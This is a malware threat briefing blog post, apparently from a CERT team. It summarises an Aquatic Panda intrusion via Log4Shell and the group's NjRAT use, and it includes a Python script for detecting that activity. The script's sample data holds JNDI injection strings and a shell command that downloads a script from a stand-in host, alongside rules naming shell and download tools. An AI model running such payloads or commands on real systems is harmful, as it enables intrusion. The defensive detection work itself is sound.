BLOG CERT SOGETI ESEC

Briefing Malware - 04/01/2022

4th of January 2022 - Winners of the 1st week: Redline, NjRAT and AsyncRAT.

Some links point to extended actionable intelligence (Threat Bulletins, TTPs, signatures, etc.) on our Threat Intelligence Platform, Anomali. This access is limited to our clients.

Threat statistics report

Publication date: 04/01/2022

Distribution: TLP:WHITE

What's new?

NjRAT (MITRE ATT&CK ID: S0385)

CrowdStrike Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt

Since the discovery of the Log4Shell vulnerabilities (#CVE-2021-44228, #CVE-2021-45105) in December 2021, every cyber security team has been dealing with multiple threats that begin with the exploitation of these flaws. In this context, #CrowdStrike Falcon OverWatch reports having disrupted a recent malware campaign thanks to early detection of an exploitation attempt against a vulnerable #Apache Tomcat process. The attacker tried to execute suspicious Linux commands before connecting to infrastructure operated by a little-known threat actor dubbed #Aquatic Panda. During the investigation, OverWatch observed that #Aquatic Panda downloaded several scripts from a remote host and then tried to understand the compromised server and harvest information from it, such as credentials, system and domain information.
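The chain summarised above has two observable stages a SOC can alert on: the Log4Shell lookup string arriving in an HTTP request, and the Tomcat JVM subsequently spawning a shell or download utility to run the attacker's Linux commands. The following Python sketch is an added defender-side illustration (it is not code from this briefing or from CrowdStrike's report). The access-log lines and process events are constructed for the example, the IP 198.51.100.7 is a documentation address, and the event fields `parent`, `image` and `cmdline` are assumptions about an EDR event schema rather than any product's real format.

```python
"""Toy detections for two stages of a Log4Shell-style intrusion on a Tomcat host:
(1) a JNDI lookup string in an HTTP request, and
(2) the Java/Tomcat process spawning a shell or download utility.
All sample data below is constructed for this example.
"""
import re
from dataclasses import dataclass

# Stage 1: JNDI lookup pattern. Matches the plain form "${jndi:" and the
# common nested-lookup form "${${...". Real-world obfuscation goes beyond
# this, so treat it as a first-pass signal, not a complete signature.
JNDI_RE = re.compile(r"\$\{\s*(?:jndi|\$\{)", re.IGNORECASE)

# Stage 2: a Tomcat JVM has no business launching an interactive shell or a
# download tool. Parent/child image names are compared as lowercase basenames.
JAVA_PARENTS = {"java", "tomcat"}
SHELL_OR_DOWNLOADER = {"sh", "bash", "dash", "curl", "wget"}


@dataclass
class Alert:
    stage: str   # which detection fired
    detail: str  # the offending log line or process lineage


def scan_access_log(lines):
    """Return one Alert per access-log line that carries a JNDI lookup string."""
    return [Alert("log4shell-request", line.strip()) for line in lines if JNDI_RE.search(line)]


def scan_process_events(events):
    """events: iterable of dicts with 'parent', 'image' (basenames) and 'cmdline'.
    Return an Alert for each java/tomcat parent that spawns a shell or downloader."""
    alerts = []
    for ev in events:
        parent = ev["parent"].lower()
        image = ev["image"].lower()
        if parent in JAVA_PARENTS and image in SHELL_OR_DOWNLOADER:
            alerts.append(Alert("java-spawned-shell", f"{ev['parent']} -> {ev['cmdline']}"))
    return alerts


# Constructed sample data (assumed formats; not taken from the CrowdStrike report).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [04/Jan/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [04/Jan/2022:10:01:07 +0000] "GET /app HTTP/1.1" 200 77 "-" "${jndi:ldap://198.51.100.7/a}"',
    '10.0.0.9 - - [04/Jan/2022:10:01:09 +0000] "GET /app HTTP/1.1" 200 77 "-" "${${lower:j}ndi:ldap://198.51.100.7/a}"',
]
SAMPLE_PROCESS_EVENTS = [
    {"parent": "systemd", "image": "java", "cmdline": "java -jar tomcat/bootstrap.jar"},
    {"parent": "java", "image": "sh", "cmdline": "sh -c 'curl -s http://198.51.100.7/a.sh -o /tmp/a.sh'"},
    {"parent": "sshd", "image": "bash", "cmdline": "bash -l"},  # legitimate admin login, must not fire
]


def run_detections():
    """Run both detectors over the sample data and return the combined alert list."""
    return scan_access_log(SAMPLE_ACCESS_LOG) + scan_process_events(SAMPLE_PROCESS_EVENTS)


if __name__ == "__main__":
    for alert in run_detections():
        print(f"[{alert.stage}] {alert.detail}")
```

Correlating the two stages on the same host within a short window (request with a JNDI string, then a java-to-shell spawn) is what turns two noisy signals into a high-confidence alert; the stage-1 regex alone will miss heavier obfuscation and the stage-2 rule alone will fire on some legitimate deployment scripts.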

#Aquatic Panda is a Chinese Advanced Persistent Threat (#APT) group with intelligence gathering and industrial espionage missions, first spotted around May 2020. They rely heavily on Cobalt Strike as well as on custom tools such as a well-known Cobalt Strike downloader, #FishMaster. They have also been observed dropping #NjRAT, a remote access trojan (#RAT) with information gathering and process/registry manipulation capabilities.

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
